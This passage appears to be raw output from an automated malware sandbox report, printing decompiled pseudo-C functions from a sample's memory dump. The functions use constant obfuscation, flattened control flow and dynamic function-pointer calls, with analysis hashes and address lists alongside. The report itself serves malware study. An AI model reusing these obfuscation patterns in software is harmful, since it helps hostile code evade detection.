                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: [E^s
                                                                                                                                                                                                                    • API String ID: 0-2787985608
                                                                                                                                                                                                                    • Opcode ID: 0930d4f3f969f26f3d9c7e2286f656a80f52d61cca2ef5d01fbd9800f3caba54
                                                                                                                                                                                                                    • Instruction ID: d04a7c2451c77f296a4c40b5d9a6de80d86085577cf0b6df1f1913e9e69f1c6f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0930d4f3f969f26f3d9c7e2286f656a80f52d61cca2ef5d01fbd9800f3caba54
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24512071D0130A9BCF59CFA5C84A4EEBBB1BF49718F20C199C425B6250C7B81A4ACFA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                                                                    			E00A75C8A(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                    				void* _t117;
                                                                                                                                                                                                                    				signed int _t121;
                                                                                                                                                                                                                    				signed int _t122;
                                                                                                                                                                                                                    				signed int _t123;
                                                                                                                                                                                                                    				signed int _t124;
                                                                                                                                                                                                                    				void* _t140;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_v44 = 0x104;
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(0x104);
                                                                                                                                                                                                                    				E00A7C6D8(0x104);
                                                                                                                                                                                                                    				_v12 = 0x46c869;
                                                                                                                                                                                                                    				_t140 = 0;
                                                                                                                                                                                                                    				_t121 = 0x3b;
                                                                                                                                                                                                                    				_v12 = _v12 / _t121;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x12d04f99;
                                                                                                                                                                                                                    				_v12 = _v12 | 0x8d7edeb1;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x9fffeeb9;
                                                                                                                                                                                                                    				_v8 = 0xd63b59;
                                                                                                                                                                                                                    				_v8 = _v8 >> 0xf;
                                                                                                                                                                                                                    				_v8 = _v8 | 0x949b4515;
                                                                                                                                                                                                                    				_t122 = 6;
                                                                                                                                                                                                                    				_v8 = _v8 * 0xc;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xf74b2457;
                                                                                                                                                                                                                    				_v24 = 0xe660d8;
                                                                                                                                                                                                                    				_t123 = 0x49;
                                                                                                                                                                                                                    				_v24 = _v24 / _t122;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x61377bc7;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x611ace3f;
                                                                                                                                                                                                                    				_v20 = 0x29fde;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xffffaaa3;
                                                                                                                                                                                                                    				_v20 = _v20 * 0x1f;
                                                                                                                                                                                                                    				_v20 = _v20 * 0x2b;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x0be35248;
                                                                                                                                                                                                                    				_v40 = 0xdb54ce;
                                                                                                                                                                                                                    				_v40 = _v40 | 0xc6e58867;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xc6fa1d50;
                                                                                                                                                                                                                    				_v16 = 0x2bd6a7;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xdeb2;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x984a4a0b;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xbae8;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x98652a16;
                                                                                                                                                                                                                    				_v36 = 0x251296;
                                                                                                                                                                                                                    				_t124 = 0x2d;
                                                                                                                                                                                                                    				_v36 = _v36 / _t123;
                                                                                                                                                                                                                    				_v36 = _v36 >> 1;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x00049a3e;
                                                                                                                                                                                                                    				_v32 = 0xa80c63;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0xd48ac099;
                                                                                                                                                                                                                    				_v32 = _v32 / _t124;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x04b61fdf;
                                                                                                                                                                                                                    				_v28 = 0x2c1004;
                                                                                                                                                                                                                    				_v28 = _v28 | 0x5ae74bb7;
                                                                                                                                                                                                                    				_v28 = _v28 << 8;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0xef5e2e29;
                                                                                                                                                                                                                    				_t125 = _v12;
                                                                                                                                                                                                                    				_t117 = E00A704F2(_v12, _a8);
                                                                                                                                                                                                                    				_t139 = _t117;
                                                                                                                                                                                                                    				if(_t117 != 0) {
                                                                                                                                                                                                                    					_t140 = E00A76C30( &_v44, _a4, _v20, _t125, _v40, _t139, _v16);
                                                                                                                                                                                                                    					E00A6E2BD(_t139, _v36, _v32, _v28);
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				return _t140;
                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                    0x00a75c92
                                                                                                                                                                                                                    0x00a75c9a
                                                                                                                                                                                                                    0x00a75c9d
                                                                                                                                                                                                                    0x00a75ca0
                                                                                                                                                                                                                    0x00a75ca3
                                                                                                                                                                                                                    0x00a75ca4
                                                                                                                                                                                                                    0x00a75ca5
                                                                                                                                                                                                                    0x00a75caa
                                                                                                                                                                                                                    0x00a75cb6
                                                                                                                                                                                                                    0x00a75cba
                                                                                                                                                                                                                    0x00a75cbf
                                                                                                                                                                                                                    0x00a75cc4
                                                                                                                                                                                                                    0x00a75ccb
                                                                                                                                                                                                                    0x00a75cd2
                                                                                                                                                                                                                    0x00a75cd9
                                                                                                                                                                                                                    0x00a75ce0
                                                                                                                                                                                                                    0x00a75ce4
                                                                                                                                                                                                                    0x00a75cef
                                                                                                                                                                                                                    0x00a75cf2
                                                                                                                                                                                                                    0x00a75cf5
                                                                                                                                                                                                                    0x00a75cfc
                                                                                                                                                                                                                    0x00a75d08
                                                                                                                                                                                                                    0x00a75d09
                                                                                                                                                                                                                    0x00a75d0e
                                                                                                                                                                                                                    0x00a75d15
                                                                                                                                                                                                                    0x00a75d1c
                                                                                                                                                                                                                    0x00a75d23
                                                                                                                                                                                                                    0x00a75d30
                                                                                                                                                                                                                    0x00a75d37
                                                                                                                                                                                                                    0x00a75d3a
                                                                                                                                                                                                                    0x00a75d41
                                                                                                                                                                                                                    0x00a75d48
                                                                                                                                                                                                                    0x00a75d4f
                                                                                                                                                                                                                    0x00a75d56
                                                                                                                                                                                                                    0x00a75d5d
                                                                                                                                                                                                                    0x00a75d64
                                                                                                                                                                                                                    0x00a75d6b
                                                                                                                                                                                                                    0x00a75d72
                                                                                                                                                                                                                    0x00a75d79
                                                                                                                                                                                                                    0x00a75d85
                                                                                                                                                                                                                    0x00a75d86
                                                                                                                                                                                                                    0x00a75d8b
                                                                                                                                                                                                                    0x00a75d91
                                                                                                                                                                                                                    0x00a75d98
                                                                                                                                                                                                                    0x00a75d9f
                                                                                                                                                                                                                    0x00a75dae
                                                                                                                                                                                                                    0x00a75db1
                                                                                                                                                                                                                    0x00a75db8
                                                                                                                                                                                                                    0x00a75dbf
                                                                                                                                                                                                                    0x00a75dc6
                                                                                                                                                                                                                    0x00a75dca
                                                                                                                                                                                                                    0x00a75dd7
                                                                                                                                                                                                                    0x00a75dda
                                                                                                                                                                                                                    0x00a75de2
                                                                                                                                                                                                                    0x00a75de6
                                                                                                                                                                                                                    0x00a75e03
                                                                                                                                                                                                                    0x00a75e0b
                                                                                                                                                                                                                    0x00a75e10
                                                                                                                                                                                                                    0x00a75e1a

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ).^
                                                                                                                                                                                                                    • API String ID: 0-2960258674
                                                                                                                                                                                                                    • Opcode ID: e89474ab411fd88b576841357b89855a589cb8afeb98c4351a829ca393554add
                                                                                                                                                                                                                    • Instruction ID: 8679d0ea72764f0698f9e2c2574c731084e952d0fb0b8246428e5b946d5b6d88
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e89474ab411fd88b576841357b89855a589cb8afeb98c4351a829ca393554add
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 694123B1D00219EFCF08CFA5D94A9EEBBB2FB48310F108159D915BA260D3B55A55CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00A72963() {
                                                                                                                                                                                                                    				signed char _v2;
                                                                                                                                                                                                                    				signed int _v276;
                                                                                                                                                                                                                    				signed int _v280;
                                                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                                                    				signed short _v320;
                                                                                                                                                                                                                    				intOrPtr _v324;
                                                                                                                                                                                                                    				intOrPtr _v328;
                                                                                                                                                                                                                    				intOrPtr _v332;
                                                                                                                                                                                                                    				intOrPtr _v336;
                                                                                                                                                                                                                    				signed int _v340;
                                                                                                                                                                                                                    				signed int _v344;
                                                                                                                                                                                                                    				signed int _v348;
                                                                                                                                                                                                                    				signed int _v352;
                                                                                                                                                                                                                    				signed int _v356;
                                                                                                                                                                                                                    				signed int _v360;
                                                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                                    				intOrPtr _t91;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v336 = 0x9bae5b;
                                                                                                                                                                                                                    				_v332 = 0x834923;
                                                                                                                                                                                                                    				_t77 = 0x81f95b4;
                                                                                                                                                                                                                    				_v328 = 0xa3da54;
                                                                                                                                                                                                                    				_t91 = 0;
                                                                                                                                                                                                                    				_v324 = 0;
                                                                                                                                                                                                                    				_v344 = 0x70e55e;
                                                                                                                                                                                                                    				_v344 = _v344 + 0xdd97;
                                                                                                                                                                                                                    				_v344 = _v344 ^ 0x007821d2;
                                                                                                                                                                                                                    				_v360 = 0xc85586;
                                                                                                                                                                                                                    				_v360 = _v360 << 5;
                                                                                                                                                                                                                    				_v360 = _v360 + 0x6806;
                                                                                                                                                                                                                    				_v360 = _v360 ^ 0x28a69bc0;
                                                                                                                                                                                                                    				_v360 = _v360 ^ 0x31a5d166;
                                                                                                                                                                                                                    				_v352 = 0x86e4b7;
                                                                                                                                                                                                                    				_v352 = _v352 >> 2;
                                                                                                                                                                                                                    				_v352 = _v352 + 0xffff0164;
                                                                                                                                                                                                                    				_v352 = _v352 >> 4;
                                                                                                                                                                                                                    				_v352 = _v352 ^ 0x000a9f94;
                                                                                                                                                                                                                    				_v340 = 0x98887d;
                                                                                                                                                                                                                    				_v340 = _v340 | 0xdc9e6fab;
                                                                                                                                                                                                                    				_v340 = _v340 ^ 0xdc9dca21;
                                                                                                                                                                                                                    				_v348 = 0xb0172f;
                                                                                                                                                                                                                    				_t89 = 0x2b;
                                                                                                                                                                                                                    				_v348 = _v348 / _t89;
                                                                                                                                                                                                                    				_v348 = _v348 | 0xfef99eff;
                                                                                                                                                                                                                    				_v348 = _v348 ^ 0xfeff5d44;
                                                                                                                                                                                                                    				_v356 = 0xdb1bf1;
                                                                                                                                                                                                                    				_v356 = _v356 >> 6;
                                                                                                                                                                                                                    				_v356 = _v356 + 0x1553;
                                                                                                                                                                                                                    				_v356 = _v356 + 0xfd9e;
                                                                                                                                                                                                                    				_v356 = _v356 ^ 0x0003b6bf;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t77 != 0x6a865) {
                                                                                                                                                                                                                    						if(_t77 == 0x99b96c) {
                                                                                                                                                                                                                    							E00A75084(_v340, _v348,  &_v320, _v356);
                                                                                                                                                                                                                    							_t77 = 0xac0e3e7;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t77 == 0x47b4465) {
                                                                                                                                                                                                                    								_v284 = 0x11c;
                                                                                                                                                                                                                    								E00A65F55( &_v284, _v344, _v360, _v352);
                                                                                                                                                                                                                    								_t77 = 0x99b96c;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t77 == 0x81f95b4) {
                                                                                                                                                                                                                    									_t77 = 0x47b4465;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t77 == 0x840e8d6) {
                                                                                                                                                                                                                    										_t77 = 0xbe8c201;
                                                                                                                                                                                                                    										_t91 = _t91 + _v280 * 0x3e8;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t77 == 0xac0e3e7) {
                                                                                                                                                                                                                    											_t77 = 0x840e8d6;
                                                                                                                                                                                                                    											_t91 = _t91 + (_v2 & 0x000000ff) * 0x186a0;
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											if(_t77 == 0xbe8c201) {
                                                                                                                                                                                                                    												_t77 = 0x6a865;
                                                                                                                                                                                                                    												_t91 = _t91 + _v276 * 0x64;
                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t91 = _t91 + (_v320 & 0x0000ffff);
                                                                                                                                                                                                                    					_t77 = 0xe42753a;
                                                                                                                                                                                                                    					L15:
                                                                                                                                                                                                                    				} while (_t77 != 0xe42753a);
                                                                                                                                                                                                                    				return _t91;
                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                    0x00a7296d
                                                                                                                                                                                                                    0x00a72977
                                                                                                                                                                                                                    0x00a7297f
                                                                                                                                                                                                                    0x00a72984
                                                                                                                                                                                                                    0x00a7298c
                                                                                                                                                                                                                    0x00a72993
                                                                                                                                                                                                                    0x00a7299c
                                                                                                                                                                                                                    0x00a729a4
                                                                                                                                                                                                                    0x00a729ac
                                                                                                                                                                                                                    0x00a729b4
                                                                                                                                                                                                                    0x00a729bc
                                                                                                                                                                                                                    0x00a729c1
                                                                                                                                                                                                                    0x00a729c9
                                                                                                                                                                                                                    0x00a729d1
                                                                                                                                                                                                                    0x00a729d9
                                                                                                                                                                                                                    0x00a729e1
                                                                                                                                                                                                                    0x00a729e6
                                                                                                                                                                                                                    0x00a729ee
                                                                                                                                                                                                                    0x00a729f3
                                                                                                                                                                                                                    0x00a729fb
                                                                                                                                                                                                                    0x00a72a03
                                                                                                                                                                                                                    0x00a72a0b
                                                                                                                                                                                                                    0x00a72a13
                                                                                                                                                                                                                    0x00a72a21
                                                                                                                                                                                                                    0x00a72a29
                                                                                                                                                                                                                    0x00a72a2d
                                                                                                                                                                                                                    0x00a72a35
                                                                                                                                                                                                                    0x00a72a3d
                                                                                                                                                                                                                    0x00a72a45
                                                                                                                                                                                                                    0x00a72a4a
                                                                                                                                                                                                                    0x00a72a52
                                                                                                                                                                                                                    0x00a72a5a
                                                                                                                                                                                                                    0x00a72a62
                                                                                                                                                                                                                    0x00a72a62
                                                                                                                                                                                                                    0x00a72a70
                                                                                                                                                                                                                    0x00a72b08
                                                                                                                                                                                                                    0x00a72b0f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72a76
                                                                                                                                                                                                                    0x00a72a78
                                                                                                                                                                                                                    0x00a72ad6
                                                                                                                                                                                                                    0x00a72ae6
                                                                                                                                                                                                                    0x00a72aed
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72a7a
                                                                                                                                                                                                                    0x00a72a80
                                                                                                                                                                                                                    0x00a72aca
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72a82
                                                                                                                                                                                                                    0x00a72a88
                                                                                                                                                                                                                    0x00a72ac4
                                                                                                                                                                                                                    0x00a72ac6
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72a8a
                                                                                                                                                                                                                    0x00a72a90
                                                                                                                                                                                                                    0x00a72aad
                                                                                                                                                                                                                    0x00a72ab8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72a92
                                                                                                                                                                                                                    0x00a72a94
                                                                                                                                                                                                                    0x00a72a9f
                                                                                                                                                                                                                    0x00a72aa1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72aa1
                                                                                                                                                                                                                    0x00a72a94
                                                                                                                                                                                                                    0x00a72a90
                                                                                                                                                                                                                    0x00a72a88
                                                                                                                                                                                                                    0x00a72a80
                                                                                                                                                                                                                    0x00a72a78
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72a70
                                                                                                                                                                                                                    0x00a72b1e
                                                                                                                                                                                                                    0x00a72b20
                                                                                                                                                                                                                    0x00a72b25
                                                                                                                                                                                                                    0x00a72b25
                                                                                                                                                                                                                    0x00a72b3d

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ^p
                                                                                                                                                                                                                    • API String ID: 0-7458621
                                                                                                                                                                                                                    • Opcode ID: 4880c073c2b46de810908a5438508eaa601f023c8de4ba6285ec07d84f9d6d10
                                                                                                                                                                                                                    • Instruction ID: 3523899b7e7f7c955e4f1df857ed93465d049857996d07fe533733ca58856848
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4880c073c2b46de810908a5438508eaa601f023c8de4ba6285ec07d84f9d6d10
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21417C715083018BC728CF14D95912BBBF1FBD4788F148A2EF58A562A0D7B4CA498B97
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                                    			E00A73AA0(intOrPtr _a4) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				void* _v56;
                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                    				intOrPtr* _t107;
                                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                                    				intOrPtr _t125;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v60 = 0x88f3e6;
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				_t110 = 0x51;
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				_v12 = 0x1824cd;
                                                                                                                                                                                                                    				_v12 = _v12 + 0xa69b;
                                                                                                                                                                                                                    				_v12 = _v12 << 8;
                                                                                                                                                                                                                    				_v12 = _v12 >> 8;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x001b2490;
                                                                                                                                                                                                                    				_v8 = 0x1526e3;
                                                                                                                                                                                                                    				_v8 = _v8 >> 4;
                                                                                                                                                                                                                    				_t125 = _a4;
                                                                                                                                                                                                                    				_v8 = _v8 * 0x4f;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x587aec51;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x581eaf09;
                                                                                                                                                                                                                    				_v36 = 0xc17096;
                                                                                                                                                                                                                    				_v36 = _v36 >> 0xb;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x00082d61;
                                                                                                                                                                                                                    				_v20 = 0x77c363;
                                                                                                                                                                                                                    				_v20 = _v20 + 0x9702;
                                                                                                                                                                                                                    				_t111 = 0x3f;
                                                                                                                                                                                                                    				_v20 = _v20 / _t110;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x000632b9;
                                                                                                                                                                                                                    				_v16 = 0x1886d1;
                                                                                                                                                                                                                    				_v16 = _v16 >> 0xb;
                                                                                                                                                                                                                    				_v16 = _v16 / _t111;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xffff7769;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0xfffbd3f9;
                                                                                                                                                                                                                    				_v40 = 0xf57df5;
                                                                                                                                                                                                                    				_v40 = _v40 | 0xea2d2d92;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xeafd7548;
                                                                                                                                                                                                                    				_v24 = 0x7fbd52;
                                                                                                                                                                                                                    				_v24 = _v24 * 0x5f;
                                                                                                                                                                                                                    				_v24 = _v24 * 0x38;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x5e9522ab;
                                                                                                                                                                                                                    				_v32 = 0x250c74;
                                                                                                                                                                                                                    				_v32 = _v32 * 0x56;
                                                                                                                                                                                                                    				_v32 = _v32 + 0xffff9f4b;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x0c76e6b2;
                                                                                                                                                                                                                    				_v28 = 0xa6368f;
                                                                                                                                                                                                                    				_v28 = _v28 + 0x661c;
                                                                                                                                                                                                                    				_v28 = _v28 | 0x1a009596;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x1aa80668;
                                                                                                                                                                                                                    				_v44 = 0xbef74c;
                                                                                                                                                                                                                    				_v44 = _v44 << 1;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x0175b396;
                                                                                                                                                                                                                    				_t104 =  *((intOrPtr*)(_t125 + 0x18))( *((intOrPtr*)(_t125 + 0x2c)), 1, 0);
                                                                                                                                                                                                                    				_t131 = _t104;
                                                                                                                                                                                                                    				if(_t104 != 0) {
                                                                                                                                                                                                                    					_push(0xa61304);
                                                                                                                                                                                                                    					_push(_v20);
                                                                                                                                                                                                                    					_push(_v36);
                                                                                                                                                                                                                    					_t106 = E00A7AF4E(_v12, _v8, _t131);
                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t125 + 0x2c)));
                                                                                                                                                                                                                    					_t127 = _t106;
                                                                                                                                                                                                                    					_push(_v24);
                                                                                                                                                                                                                    					_push(_t106);
                                                                                                                                                                                                                    					_t107 = E00A70192(_v16, _v40);
                                                                                                                                                                                                                    					if(_t107 != 0) {
                                                                                                                                                                                                                    						 *_t107();
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					E00A7D6DF(_v32, _t127, _v28, _v44);
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                    0x00a73aa6
                                                                                                                                                                                                                    0x00a73ab5
                                                                                                                                                                                                                    0x00a73ab8
                                                                                                                                                                                                                    0x00a73abb
                                                                                                                                                                                                                    0x00a73abc
                                                                                                                                                                                                                    0x00a73abd
                                                                                                                                                                                                                    0x00a73ac4
                                                                                                                                                                                                                    0x00a73acb
                                                                                                                                                                                                                    0x00a73acf
                                                                                                                                                                                                                    0x00a73ad3
                                                                                                                                                                                                                    0x00a73ada
                                                                                                                                                                                                                    0x00a73ae1
                                                                                                                                                                                                                    0x00a73ae9
                                                                                                                                                                                                                    0x00a73aec
                                                                                                                                                                                                                    0x00a73aef
                                                                                                                                                                                                                    0x00a73af6
                                                                                                                                                                                                                    0x00a73afd
                                                                                                                                                                                                                    0x00a73b04
                                                                                                                                                                                                                    0x00a73b08
                                                                                                                                                                                                                    0x00a73b0f
                                                                                                                                                                                                                    0x00a73b16
                                                                                                                                                                                                                    0x00a73b22
                                                                                                                                                                                                                    0x00a73b23
                                                                                                                                                                                                                    0x00a73b28
                                                                                                                                                                                                                    0x00a73b2f
                                                                                                                                                                                                                    0x00a73b36
                                                                                                                                                                                                                    0x00a73b41
                                                                                                                                                                                                                    0x00a73b44
                                                                                                                                                                                                                    0x00a73b4b
                                                                                                                                                                                                                    0x00a73b52
                                                                                                                                                                                                                    0x00a73b59
                                                                                                                                                                                                                    0x00a73b60
                                                                                                                                                                                                                    0x00a73b67
                                                                                                                                                                                                                    0x00a73b74
                                                                                                                                                                                                                    0x00a73b7b
                                                                                                                                                                                                                    0x00a73b7e
                                                                                                                                                                                                                    0x00a73b85
                                                                                                                                                                                                                    0x00a73b90
                                                                                                                                                                                                                    0x00a73b93
                                                                                                                                                                                                                    0x00a73b9a
                                                                                                                                                                                                                    0x00a73ba1
                                                                                                                                                                                                                    0x00a73ba8
                                                                                                                                                                                                                    0x00a73baf
                                                                                                                                                                                                                    0x00a73bb6
                                                                                                                                                                                                                    0x00a73bbd
                                                                                                                                                                                                                    0x00a73bc4
                                                                                                                                                                                                                    0x00a73bc7
                                                                                                                                                                                                                    0x00a73bd1
                                                                                                                                                                                                                    0x00a73bd4
                                                                                                                                                                                                                    0x00a73bd6
                                                                                                                                                                                                                    0x00a73bd9
                                                                                                                                                                                                                    0x00a73bde
                                                                                                                                                                                                                    0x00a73be1
                                                                                                                                                                                                                    0x00a73bea
                                                                                                                                                                                                                    0x00a73bef
                                                                                                                                                                                                                    0x00a73bf2
                                                                                                                                                                                                                    0x00a73bf4
                                                                                                                                                                                                                    0x00a73bfd
                                                                                                                                                                                                                    0x00a73bfe
                                                                                                                                                                                                                    0x00a73c08
                                                                                                                                                                                                                    0x00a73c0a
                                                                                                                                                                                                                    0x00a73c0a
                                                                                                                                                                                                                    0x00a73c17
                                                                                                                                                                                                                    0x00a73c1e
                                                                                                                                                                                                                    0x00a73c25

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: QzX
                                                                                                                                                                                                                    • API String ID: 0-3831714250
                                                                                                                                                                                                                    • Opcode ID: ece2f7466d4019a4f6634b7c327b3427a8f32e62923ba0d62274e13a2383abac
                                                                                                                                                                                                                    • Instruction ID: 9e8b91b2eb4973cd26f6c5e12be80de6e2fe06627cbc28b5409b84b2b946e8e9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ece2f7466d4019a4f6634b7c327b3427a8f32e62923ba0d62274e13a2383abac
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6410072D0020AEBDB04CFA5D98A5EEFBB1BB44314F208159D511BA260D3B56A55CF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                    			E00A6A02A(signed int __edx) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v12 = 0x17f0d;
                                                                                                                                                                                                                    				_t109 = 0x32;
                                                                                                                                                                                                                    				_v12 = _v12 / _t109;
                                                                                                                                                                                                                    				_v12 = _v12 + 0xffff069e;
                                                                                                                                                                                                                    				_t110 = 0xb;
                                                                                                                                                                                                                    				_v12 = _v12 * 0x23;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0xffd3a7a6;
                                                                                                                                                                                                                    				_v28 = 0x326cfa;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x266db6eb;
                                                                                                                                                                                                                    				_v28 = _v28 + 0xffff2119;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x2657cbd5;
                                                                                                                                                                                                                    				_v24 = 0x34122d;
                                                                                                                                                                                                                    				_v24 = _v24 >> 9;
                                                                                                                                                                                                                    				_v24 = _v24 + 0x651c;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x0005835a;
                                                                                                                                                                                                                    				_v8 = 0xc39fdf;
                                                                                                                                                                                                                    				_v8 = _v8 << 3;
                                                                                                                                                                                                                    				_v8 = _v8 >> 0x10;
                                                                                                                                                                                                                    				_v8 = _v8 | 0x1bdb57fd;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x1bdeb567;
